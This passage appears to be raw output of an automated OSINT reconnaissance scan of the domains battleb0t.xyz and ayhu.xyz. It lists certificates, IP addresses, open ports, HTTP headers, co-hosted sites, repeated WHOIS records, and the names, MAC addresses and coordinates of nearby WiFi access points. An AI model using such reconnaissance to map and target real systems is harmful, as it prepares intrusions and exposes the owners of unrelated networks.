keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/TQXQbT5nMS4
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/PX7fR59yV-s.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8a:d2:67:fd:ed:b1:23:72:f0:a2:4c:97:ee:c5:7e:e1:b0:
84:de:17:e3:7f:b0:fd:4c:e4:f5:d9:c1:87:4a:b8:32:d6:97:
13:2d:ab:c3:d8:0c:ce:60:02:7a:3d:d5:8b:4f:9b:89:37:1e:
07:e8:65:4f:13:db:bc:f2:3f:ba:ea:3a:b7:97:d8:a0:c0:4a:
65:8c:35:35:fd:69:77:08:6c:3c:bf:e2:a6:4a:02:ca:fc:ed:
e5:52:89:bc:c1:b6:61:98:79:3c:a3:31:8c:d6:1d:49:4c:6e:
4f:51:4b:80:2f:a3:0a:eb:fd:a0:1d:23:01:9e:b7:13:91:2e:
ea:39:a6:6a:a5:6e:65:a0:60:47:cf:fa:44:01:e4:af:f2:74:
c6:c0:9c:28:45:d7:eb:58:39:c7:39:24:41:f2:f3:e3:a3:aa:
8b:59:5c:05:a1:91:0e:a2:f0:b0:ab:cb:39:e8:59:97:1b:9f:
8d:d8:c2:47:ab:c2:d9:46:03:7a:5d:eb:fd:3e:65:0d:f9:fe:
dc:1b:a2:95:80:34:f0:64:f6:d6:5a:43:e4:2b:5f:53:8b:84:
65:53:97:2f:8f:bb:f4:1d:f8:10:82:18:da:d2:33:31:94:ea:
59:b0:de:49:31:a7:28:65:0c:5e:e7:fb:cf:58:f0:de:70:9b:
5c:67:53:d1
|
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_6.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:55:18 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 46.101.229.70:22 | 46.101.229.70 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:DD:2B:69) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pornhub Users (Category: XXXPORNXXX)<br>https://www.pornhub.com/users/login | login |
| 2023-05-12 02:45:16 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Toronto, Ontario, ON, Canada, CA | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | nocwap (Net ID: 00:04:5A:CC:3F:27) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:27 | IP Address | No | DNS Resolver | 51 | 0 | 2 | 0 | None | 172.67.168.252 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MIP (Net ID: 00:01:29:EE:B3:03) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | DD-WRT (Net ID: 00:14:BF:30:AA:54) | 32.8608, -79.9746 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 20:35:09 (Net ID: 00:02:2D:05:BE:2A) | 37.780462,-122.390564 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RyanLG (Net ID: 00:01:36:4F:9A:F0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.69 | 34.74.170.74 |
| 2023-05-12 03:00:10 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | cpanel.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:08:59 | Affiliate - IP Address | No | DNS Look-aside | 3 | 0 | 2 | 0 | None | 87.248.157.93 | 87.248.157.102 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.251): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:58 | Physical Coordinates | No | AbstractAPI | 93 | 0 | 3 | 0 | None | 50.1188, 8.6843 | 64.226.81.43 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:cc:cb:40:35:8f:10:16:7b:c7:37:cb:94:7e:31:1a
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Mar 23 00:00:00 2023 GMT
Not After : Mar 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:c7:e0:ee:e2:73:a9:c6:66:6e:30:ed:fc:ae:52:
d4:ca:18:2f:13:3b:72:ab:38:92:54:46:c1:4d:8e:
47:44:3c:fd:42:6f:de:16:4a:26:42:38:ad:e6:91:
f4:0b:0b:51:3f:e6:50:3a:4c:ca:ea:9e:3d:ae:a2:
1a:21:17:88:b9
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
ED:98:C9:DB:21:9F:40:A3:B3:0F:A1:47:F2:8D:C0:DD:DA:EB:C7:D1
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA256
30:46:02:21:00:f0:9f:8d:f6:d4:d5:c9:85:3d:e1:3b:e8:89:
39:bb:cd:62:6f:8c:ee:3f:e9:ac:78:6c:9b:85:17:ee:a9:64:
05:02:21:00:e4:53:28:da:31:66:f2:dc:34:6e:1b:42:2d:d7:
79:d3:ee:4b:3d:8a:1c:37:ce:37:5d:dc:4f:bf:b9:94:32:b3
| battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 220-cp.keyubu.net ESMTP Exim 4.95 #2 Wed, 10 May 2023 17:29:11 +0300<br>220-We do not authorize the use of this system to transport unsolicited,<br>220 and/or bulk e-mail. | 87.248.157.102 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:443 | 188.114.97.0/24 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.132 | 34.148.97.127 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FizzyPop (Net ID: 00:02:2D:0F:C8:E1) | 34.0544, -118.244 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 07:55:46 (Net ID: 00:02:2D:05:BB:87) | 37.780462,-122.390564 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 02:44:09 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | HTTP/3 | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55154D2E3 (Net ID: 00:01:E3:54:D2:E3) | 52.3759, 4.8975 |
| 2023-05-12 03:41:56 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | tjdev.de | mn2.tjdev.de |
| 2023-05-12 02:44:10 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://funny.battleb0t.xyz | funny.battleb0t.xyz |
| 2023-05-12 03:18:50 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://funny.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | #LG@Vo1P*Service& (Net ID: 00:01:36:57:A4:17) | 37.780462,-122.390564 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | GZN00674 (Net ID: 00:00:00:00:00:F0) | 52.3759, 4.8975 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F1:C3:85) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 9 | 0 | 3 | 0 | None | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} | https://battleb0t.xyz/./src/style.css?4 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | AUMWLAN (Net ID: 00:02:2D:0A:E6:C5) | 50.1188, 8.6843 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE271 (Net ID: 00:02:2D:8F:2B:40) | 37.7642, -122.3993 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007ayong.github.io |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000panther.github.io | 185.199.111.153 |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | dontkillmyapp.com | 0.dontkillmyapp.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jbnowires (Net ID: 00:06:25:F6:CF:DC) | 39.0469, -77.4903 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 02:55:15 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 165.232.113.85:443 | 165.232.113.85 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.69): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PMV (Net ID: 00:05:5D:FA:C1:BE) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:09 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Cloudflare Turnstile | ayhu.xyz |
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:8443 | 188.114.96.1 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.78): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 141205 (Net ID: 00:0B:85:50:7F:90) | 39.0469, -77.4903 |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-to-1.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-timer: S1683860056.740489,VS0,VE2 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/login | login |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-range.github.io |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.110 | 35.229.48.116 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | prettyflyforawifi 5 (Net ID: 00:01:9F:34:7C:4C) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | kathyncrew (Net ID: 00:05:3C:08:76:43) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.214): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00indahouse.github.io |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14806242598 |
